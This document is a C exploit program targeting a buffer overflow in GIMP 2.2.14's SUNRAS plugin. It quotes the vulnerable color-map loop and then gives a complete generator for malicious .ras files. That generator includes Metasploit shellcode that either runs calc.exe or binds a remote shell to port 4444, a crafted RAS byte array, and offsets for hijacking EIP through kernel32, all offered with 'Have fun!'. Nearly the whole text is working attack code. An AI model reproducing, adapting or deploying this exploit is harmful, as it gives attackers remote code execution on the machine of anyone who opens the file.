Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit

/***************************************************************************** * * * Gimp v2.2.14 .RAS File SUNRAS Plugin Buffer Overflow * * * * * * Gimp uses SUNRAS plugin to process .RAS file. But this module is vulnerable * * to a buffer overflow in set_color_table which leads to code execution. * * * * Vulnerable code, sunras.c:862 * * * * int ncols, j; * * guchar ColorMap[256*3]; * * * * ncols = sunhdr->l_ras_maplength / 3; * * if (ncols <= 0) return; * * * * for (j = 0; j < ncols; j++) * * { * * ColorMap[j*3] = suncolmap[j]; * * ColorMap[j*3+1] = suncolmap[j+ncols]; * * ColorMap[j*3+2] = suncolmap[j+2*ncols]; * * } * * * * This exploit runs calc.exe or binds shell to port 4444. * * Tested against Win XP SP2 FR but the bug exists in all systems. * * Have Fun! * * * * Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> * *****************************************************************************/ #include "stdio.h" #include "stdlib.h" /* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char CalcShellcode[] = "x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x98" "x11xbexa7x83xebxfcxe2xf4x64xf9xfaxa7x98x11x35xe2" "xa4x9axc2xa2xe0x10x51x2cxd7x09x35xf8xb8x10x55xee" "x13x25x35xa6x76x20x7ex3ex34x95x7exd3x9fxd0x74xaa" "x99xd3x55x53xa3x45x9axa3xedxf4x35xf8xbcx10x55xc1" "x13x1dxf5x2cxc7x0dxbfx4cx13x0dx35xa6x73x98xe2x83" "x9cxd2x8fx67xfcx9axfex97x1dxd1xc6xabx13x51xb2x2c" "xe8x0dx13x2cxf0x19x55xaex13x91x0exa7x98x11x35xcf" "xa4x4ex8fx51xf8x47x37x5fx1bxd1xc5xf7xf0x6fx66x45" "xebx79x26x59x12x1fxe9x58x7fx72xdfxcbxfbx3fxdbxdf" "xfdx11xbexa7"; /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char BindShellcode[] = "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5c" "x7bx78x7fx83xebxfcxe2xf4xa0x11x93x32xb4x82x87x80" "xa3x1bxf3x13x78x5fxf3x3ax60xf0x04x7ax24x7ax97xf4" "x13x63xf3x20x7cx7ax93x36xd7x4fxf3x7exb2x4axb8xe6" "xf0xffxb8x0bx5bxbaxb2x72x5dxb9x93x8bx67x2fx5cx57" "x29x9exf3x20x78x7ax93x19xd7x77x33xf4x03x67x79x94" "x5fx57xf3xf6x30x5fx64x1ex9fx4axa3x1bxd7x38x48xf4" "x1cx77xf3x0fx40xd6xf3x3fx54x25x10xf1x12x75x94x2f" "xa3xadx1ex2cx3ax13x4bx4dx34x0cx0bx4dx03x2fx87xaf" "x34xb0x95x83x67x2bx87xa9x03xf2x9dx19xddx96x70x7d" "x09x11x7ax80x8cx13xa1x76xa9xd6x2fx80x8ax28x2bx2c" "x0fx28x3bx2cx1fx28x87xafx3ax13x69x23x3ax28xf1x9e" "xc9x13xdcx65x2cxbcx2fx80x8ax11x68x2ex09x84xa8x17" "xf8xd6x56x96x0bx84xaex2cx09x84xa8x17xb9x32xfex36" "x0bx84xaex2fx08x2fx2dx80x8cxe8x10x98x25xbdx01x28" "xa3xadx2dx80x8cx1dx12x1bx3ax13x1bx12xd5x9ex12x2f" "x05x52xb4xf6xbbx11x3cxf6xbex4axb8x8cxf6x85x3ax52" "xa2x39x54xecxd1x01x40xd4xf7xd0x10x0dxa2xc8x6ex80" "x29x3fx87xa9x07x2cx2ax2ex0dx2ax12x7ex0dx2ax2dx2e" "xa3xabx10xd2x85x7exb6x2cxa3xadx12x80xa3x4cx87xaf" "xd7x2cx84xfcx98x1fx87xa9x0ex84xa8x17xacxf1x7cx20" "x0fx84xaex80x8cx7bx78x7f"; char RAS[]= "x59xa6x6ax95x00x00x01xfdx00x00x01xb6x00x00x00x08" "x00x03x68x94x00x00x00x00x00x00x00x01x00x00x03x29" "x1bxffxbcxefx73xd9x13x00x70xf0xccx8dx99x50xf1xf7" "xacx4dxf0xabxe0xecxefx2exe5x8cxefxa6x33x8cxc6xfa" "xfex00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x1bxffxd7x64x8bx7cx41x84x00x2dx00xd0x99x94xe9xad" "xb4x4bxc9x85xe9xe5xb4x80x98x8cxe0xc4x33xb6xd5xf7" "x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00xe3x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x19xffxeax2exd2xd9xb6xb4x00x6cxccxe6x99xc5xe6x32" "xb4x51x90x90x24x00x00x00x3ax8cxd3xd9x33xd5xddxf3" "x02x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x7bx00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42xebx10x81x90" "x8bxf8x00x0dxffx42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x00x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x4ex01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x22" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01xd5x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x00x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x35x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "xb3x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x3dx01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x4ax01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x00x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x1fx01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01xddx01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x00x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01xf8x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x05x05x01x01x01x01x01x01" "x01x01x01x10x11x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x0ax11x11" "x11x11x19x0ax01x01x01x01x10x0ex01x01x01x01x01x05" "x08x1fx01x15x11x1cx1cx0ax01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x00x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x08x11x01x01x01x01x01x01x01x01" "x01x10x00x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x19x00x0cx19x08" "x11x00x08xfbx01x01x08x11x01x01x01x01x01x0ax00x1f" "x1fx11x08x0ax19x00x05x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01xcdx01x01x01x01" "x8bx01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x1ax01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x00x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01" ; int main(int argc, char* argv[]) { FILE* rasfile; char evilbuff[4000]; int offset=0; printf("[+] Gimp v2.2.14 .RAS File SUNRAS Plugin Buffer Overflow "); printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> "); if (argc!=3) { printf("[+] Usage: %s Mode <file.ras> ",argv[0]); printf("[+] Mode is 0 -> run calc.exe "); printf("[+] 1 -> bind shell to port 4444 "); return 0; } memcpy(evilbuff,RAS,sizeof(RAS)-1); /*pffff this part is ... hum ... complicated! well, we can access our shellcode at [ESP+0xF4]-0x0D00 so we put on the top of the stack: NOP NOP NOP NOP MOV EAX,[ESP+0xF8] <- do not forget ret add! SUB EAX,0x0D00 CALL EAX and we replace EIP by CALL ESP, say 0x7c81518b in Kernel32 */ memset(evilbuff+0x125,0x7c,1); memset(evilbuff+0x33e,0x81,1); memset(evilbuff+0x231,0x51,1); memset(evilbuff+0x124,0x8b,1); if (!atoi(argv[1])) memcpy(evilbuff+0x380,CalcShellcode,sizeof(CalcShellcode)-1); else memcpy(evilbuff+0x380,BindShellcode,sizeof(BindShellcode)-1); if ((rasfile=fopen(argv[2],"wb"))==0) { printf("[-] Unable to access file. "); return 0; } fwrite( evilbuff, 1, 4000, rasfile ); fclose(rasfile); printf("[+] Done. Have fun! "); return 0; } // sebug.net